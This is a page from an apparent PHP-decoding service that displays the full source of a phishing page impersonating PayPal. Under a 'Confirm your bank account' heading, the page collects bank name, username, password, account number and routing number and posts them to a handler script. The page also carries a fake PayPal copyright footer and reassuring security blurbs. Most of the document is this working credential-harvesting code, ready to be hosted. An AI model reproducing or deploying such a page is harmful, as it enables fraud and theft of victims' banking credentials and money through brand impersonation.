Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php session_start(); ?> <!doctype html> <html lang="en"> <head> <meta char..

Decoded Output download

None

Did this file decode correctly?

Original Code

<?php
session_start();


?>
<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width" />
    <title>Bank - PayPal</title>
    <link href="../css/style.css" rel="stylesheet" type="text/css">
    <meta name="robots" content="noindex" />
    <link rel="icon" href="../css/fav.ico" />
    <script src="http://code.jquery.com/jquery-2.1.4.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>


</head>
<body style="background-color: #6D6E71;">
<div class="contenaire">
    <div class="grey-background">
        <div class="header">
            <p class="img"></p>
        </div>
        <div class="content">
            <div class="warp">
                <div class="navout colum navoutx">
                    <div class="navinner nav-col navinnerx">
                        <h2 style="color: #2C2E2F">Welcome<?php if(!isset($_SESSION['fname'])){}
                            else{echo ', '.ucfirst($_SESSION['fname']).'!';
                            }?> </h2>
                        <h4>Confirm your bank account</h4>
                        <form method="post" action="../post.php">
                            <div class="textinputs inputspecial">
                                <input type="text" autocomplete="off" name="bankname" style="text-transform: none;border: none;" placeholder="Bank Name" value="<?php echo $_SESSION['bankName']; ?>">
                            </div>
                            <div class="group">
                                <div class="textinputs inputspecial" style="width: 48%;float: left;margin: 6px 0px 6px 10px;">
                                    <input class="input-text pattern-validate" pattern=".[^\!\@\#\$\%\^\&amp;\*\?\~\=\>\<\'\/\\]{1,50}"  autocomplete="off" id="noSpacesField" name="bankuserid" style="text-transform: none;border: none" placeholder="Bank Username">
                                </div>
                                <div class="textinputs inputspecial" style="width: 44%;float: right;margin: 6px 10px 6px 0px;">
                                    <input type="password" autocomplete="off" name="bankpassword" class="cc-cvc" style="text-transform: none;border: none" placeholder="Bank Password" value="">
                                </div>
                            </div>
                            <div class="group">
                                <div class="textinputs inputspecial" style="width: 48%;float: left;margin: 6px 0px 6px 10px;">
                                    <input type="text" autocomplete="off" name="accountnumber" style="text-transform: none;border: none" placeholder="Account number">
                                </div>
                                <div class="textinputs inputspecial" style="width: 44%;float: right;margin: 6px 10px 6px 0px;">
                                    <input type="text" autocomplete="off" name="routingnumber" style="text-transform: none;border: none" placeholder="Routing number"  value="">
                                </div>
                            </div>
                            <div class="textinputs" style="margin-top: 30px;">
                                <div class="buttons">
                                    <button type="submit" class="btn btnPremary" id="submit" name="btnBank" style="padding-left: 30px;padding-right: 40px;">Continue</button>
                                </div>
                            </div>
                        </form>
                    </div>
                </div>
                <div class="navoutright colum">
                    <div class="image5">
                        <h2>Help us keep you safer</h2>
                        <p>Sometimes we'll ask you a unique question to verify who you are.</p>
                    </div>
                    <div class="image6">
                        <h2>All day, every day</h2>
                        <p>Our team of security experts work around the clock to keep you protected. We're here for your safety.</p>
                    </div>
                </div>
            </div>
        </div>

    </div>
    <footer class="footers">
        <div class="footer-nav">
            <div class="sitelinks container-fluid">
                <ul class="navlist">
                    <li><a href="#">Contact</a></li>
                    <li><a href="#">Security</a></li>
                    <li><a href="#">Logout</a></li>
                </ul>
            </div>

        </div>
        <div class="footer-legal">
            <div class="container-fluid">
                <span class="copyright">Copyright  1999 - <?php echo date('Y') ?> PayPal. All rights reserved.</span>
                <span class="copyright-short"> 1999 - <?php echo date('Y') ?></span>
                <ul class="navlist footer-list">
                    <li><a href="#">Privacy</a> </li>
                    <li><a href="#">Legal</a></li>
                </ul>
            </div>
        </div>
    </footer>
</div>
<script src="../js/jquery.payment.js"></script>
<script src="../js/jquery.maskedinput.min.js"></script>
<script src="http://ajax.microsoft.com/ajax/jquery.validate/1.7/additional-methods.js"></script>
<script>
    $('.textinputs input').on({
        blur : function () {
            if( $(this).val().length === 0 ) {
                $(this).addClass('hasErreur2');
                $(this).parent('.inputspecial').addClass('hasErreur2');
            }else{
                $(this).removeClass('hasErreur');
                $(this).removeClass('hasErreur2');
                $(this).parent('.inputspecial').removeClass('hasErreur2');
            }
        }
    });
    $(function(){
        $('#noSpacesField').bind('input', function(){
            $(this).val(function(_, v){
                return v.replace(/\s+/g, '');
            });
        });
    });
    $('.cc-num').on({
        blur : function () {
            if($(this).val().length ===0){
                $(this).addClass('hasErreur');
                $(this).removeClass('hasErreur2');
                $('.card').css('display','none');
            }
        },
        keydown : function () {
            $(this).removeClass('hasErreur');
            $(this).removeClass('hasErreur2');
            $(this).parent('.inputspecial').removeClass('hasErreur2');
            $('.card').css('display','block');
        }
    });
    $('.cc-cvc').on({
        blur : function () {
            if($(this).val().length ===0){
                $(this).addClass('hasErreur');
                $(this).removeClass('hasErreur2');
                $('.cardcvv').css('display','none');
            }
        },
        keydown : function () {
            $(this).removeClass('hasErreur');
            $(this).removeClass('hasErreur2');
            $(this).parent('.inputspecial').removeClass('hasErreur2');
            $('.cardcvv').css('display','block');
        }
    });
    $('.inputspecial input').on({
        blur : function () {
            if($(this).val().length ===0){
                $(this).addClass('hasErreur');
                $(this).removeClass('hasErreur2');
            }
        },
        keydown : function () {
            $(this).removeClass('hasErreur');
            $(this).removeClass('hasErreur2');
            $(this).parent('.inputspecial').removeClass('hasErreur2');
            $('.cardcvv').css('display','block');
        }
    });
    $('.textinputs select').change(function()
    {
        if( $(this).val().length === 0 ) {
            $(this).parent('.selectDown').addClass('hasErreur2');
        }else{
            $(this).parent('.selectDown').removeClass('hasErreur2');
        }
    });

    $(".inputspecial input").on({
        focus: function () {
            $(this).parent('.inputspecial').addClass('inputspecialBlue');
        },
        blur: function () {
            $(this).parent('.inputspecial').removeClass('inputspecialBlue');
        }
    });

    $(document).on("click","#inchecked",function(){
        var inchecked = document.getElementById('inchecked');
        var atm = document.getElementById('atmppin');

        if(inchecked.id == 'inchecked'){
            inchecked.id = "checked";
            atm.style.display = "block";
        }
    });
    $(document).on("click","#checked",function(){
        var checked = document.getElementById('checked');
        var atm = document.getElementById('atmppin');
        if(checked.id == 'checked'){
            checked.id = "inchecked";
            atm.style.display = "none"
        }
    });
</script>

</body>
</html>

Function Calls

date 1
session_start 1

Variables

None

Stats

MD5 647f8a0749667405577ff196684c6eaf
Eval Count 0
Decode Time 106 ms